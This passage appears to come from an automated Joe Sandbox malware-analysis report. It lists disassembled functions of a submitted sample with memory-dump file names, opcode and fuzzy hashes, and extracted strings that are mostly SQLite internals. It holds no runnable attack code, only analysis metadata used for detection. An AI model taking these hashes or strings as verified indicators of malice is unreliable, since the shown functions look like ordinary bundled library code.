                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                              • API String ID: 0-2903559916
                                                                                                                                                                                                                              • Opcode ID: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                                                              • Instruction ID: 9116f7137e1956407b9c21f38011b66fbab15b3e50aea473c54c0f40b67681b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6727CE2B09B9685EB998F26E458E7967A5FF44B80F194136DE4D477A2DF3CE840C300
                                                                                                                                                                                                                              Function 00007FFB0C6FB660 Relevance: 4.5, Strings: 3, Instructions: 715COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: LAST TERM OF $USE TEMP B-TREE FOR %sORDER BY$USE TEMP B-TREE FOR LAST %d TERMS OF ORDER BY
                                                                                                                                                                                                                              • API String ID: 0-13984226
                                                                                                                                                                                                                              • Opcode ID: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
                                                                                                                                                                                                                              • Instruction ID: 8fa286a8331fdeefbc02d7637479d64edce48d1604fd2bb7ac7e14f5a9def3b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA728EB2618A818BD721DF25D844BAD7BA1FBC4F88F148236DB8E47759DB39D412CB40
                                                                                                                                                                                                                              Function 00007FFB0C6A8EF0 Relevance: 4.2, Strings: 3, Instructions: 463COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 5$7$row value misused
                                                                                                                                                                                                                              • API String ID: 0-355943616
                                                                                                                                                                                                                              • Opcode ID: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                                              • Instruction ID: f989aba4f0736dadd10d7dc57e08112e6b3432521084a44cec22a935c275bcc7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A82290F2A086818AD771CF25D848BAD7BA1FB88B94F558176EB8E47795CB38D441CF00
                                                                                                                                                                                                                              Function 00007FFB0C724C90 Relevance: 4.1, Strings: 3, Instructions: 392COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                              • API String ID: 0-4001610065
                                                                                                                                                                                                                              • Opcode ID: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                                              • Instruction ID: 8747a07a2739f27cf978d291855171b8d0c5bdf1410cd41394b6a3b07086eaff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A029FF2B0878686E7A48F35E448AA973A5FF88B84F458036DA4E47795DF3CE844C741
                                                                                                                                                                                                                              Function 00007FFB0C6EFEF0 Relevance: 4.0, Strings: 2, Instructions: 1539COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$K
                                                                                                                                                                                                                              • API String ID: 0-2992733795
                                                                                                                                                                                                                              • Opcode ID: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                                                              • Instruction ID: 7cc37b9832859082eb4525a889e1dfebba76fafeeb22eda122e740b052e914e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F26BE5A09B46C6EB658F36E848A7963A1FF85B84F154136EE4E43765DF3CE442C300
                                                                                                                                                                                                                              Function 00007FFB0C6A2A90 Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                              • API String ID: 0-4001610065
                                                                                                                                                                                                                              • Opcode ID: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                                              • Instruction ID: 5cf7c13c4e65ce2197f0f9a8aef76edd4a871ae5d487c55e21c2c0903d287dcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72918DF2A0878687DB259F26DA9896977A2FF84B84F444036DF4D47B51DF38E4528B00
                                                                                                                                                                                                                              Function 00007FFB0C69F5A0 Relevance: 3.9, Strings: 3, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                              • API String ID: 0-4001610065
                                                                                                                                                                                                                              • Opcode ID: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                                                              • Instruction ID: 97199c47f954e9c1b8e53cd6646024462ce75ebb2a85f9f9a070558d27054bf0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9161D5F2B0875142EB758FB6D948A2D27A5FF88B90F164535EE0E87750CF38E8928741
                                                                                                                                                                                                                              Function 00007FFB0C6E25A0 Relevance: 3.7, Strings: 2, Instructions: 1161COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: DELETE FROM '%q'.'%q_data' WHERE id>=? AND id<=?$DELETE FROM '%q'.'%q_idx' WHERE segid=?
                                                                                                                                                                                                                              • API String ID: 0-1811289845
                                                                                                                                                                                                                              • Opcode ID: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                                                              • Instruction ID: c387f63eed2758ff40e28315b5aeb2d6eb880743f01028a6ff6839c90338be3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78C27BF2A08A8286EB65CF35D858BB937A5FF44B88F058136EA4E47794DF78E445C700
                                                                                                                                                                                                                              Function 00007FFB0C7A6E30 Relevance: 3.5, APIs: 2, Instructions: 508COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                                                              • Instruction ID: e0ee546dd72b600af9ac8dccdddd72f6b64c243c590451a93b545dadb4a58e82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A3237F6B08A4286EB58CF3AD448A6D37A1FF84B88F164071DE5E577A4DF38E8458740
                                                                                                                                                                                                                              Function 00007FFB0C736690 Relevance: 3.3, Strings: 2, Instructions: 825COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$rows deleted
                                                                                                                                                                                                                              • API String ID: 0-3120709674
                                                                                                                                                                                                                              • Opcode ID: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                                                              • Instruction ID: ad96fc010e1a69d6b4264a99fa5714bd9d1e6ce3606d802cf4c8a2652027dc27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3826CF27087818AEB65DB25E548BAA7BA5FF88B84F144135DB8D47B95DF3CE4408B00
                                                                                                                                                                                                                              Function 00007FFB0C7565F0 Relevance: 3.1, Strings: 2, Instructions: 571COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: content$docsize
                                                                                                                                                                                                                              • API String ID: 0-1024698521
                                                                                                                                                                                                                              • Opcode ID: 5647b0fb2116a3682b79423136907baf7c8e96fe595cd97045afb37f6abbffce
                                                                                                                                                                                                                              • Instruction ID: e1558cab0e5e045e81d14500c170a8567d191fa52d51227e8a12da3f0ceab3b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5647b0fb2116a3682b79423136907baf7c8e96fe595cd97045afb37f6abbffce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 404269F5A09B028AFB648B36D458E7927A5FF44B88F444435EE1E077A4DFBCE8458340
                                                                                                                                                                                                                              Function 00007FFB0C67AAE6 Relevance: 2.9, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: G$fts5 expression tree is too large (maximum depth %d)
                                                                                                                                                                                                                              • API String ID: 0-1043253150
                                                                                                                                                                                                                              • Opcode ID: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                                                              • Instruction ID: 1bd2d8ed2f5329c2c0027b783debc21398fbb1b56617c9ca976647b927d4337f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2102AEE2A09B5282EB668F75D858A7937A5FF44B84F149A31EE4D077A9CF3CE441C300
                                                                                                                                                                                                                              Function 00007FFB0C7A8830 Relevance: 2.9, Strings: 2, Instructions: 379COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                              • API String ID: 0-3175670447
                                                                                                                                                                                                                              • Opcode ID: a09f9c7bbce053fb535f404b7bf89ebe573d68902540534e6087ba50ee00e041
                                                                                                                                                                                                                              • Instruction ID: 349072b2004cdacde7b83ff21768213ea21f54cea335d2ee9ddc7685af8be148
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a09f9c7bbce053fb535f404b7bf89ebe573d68902540534e6087ba50ee00e041
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F1C1B2A0878686E764DF35E044B6E77A0FBC8B88F115135DA9D87B98DF38E444CB00
                                                                                                                                                                                                                              Function 00007FFB0C6FE770 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -- TRIGGER %s$out of memory
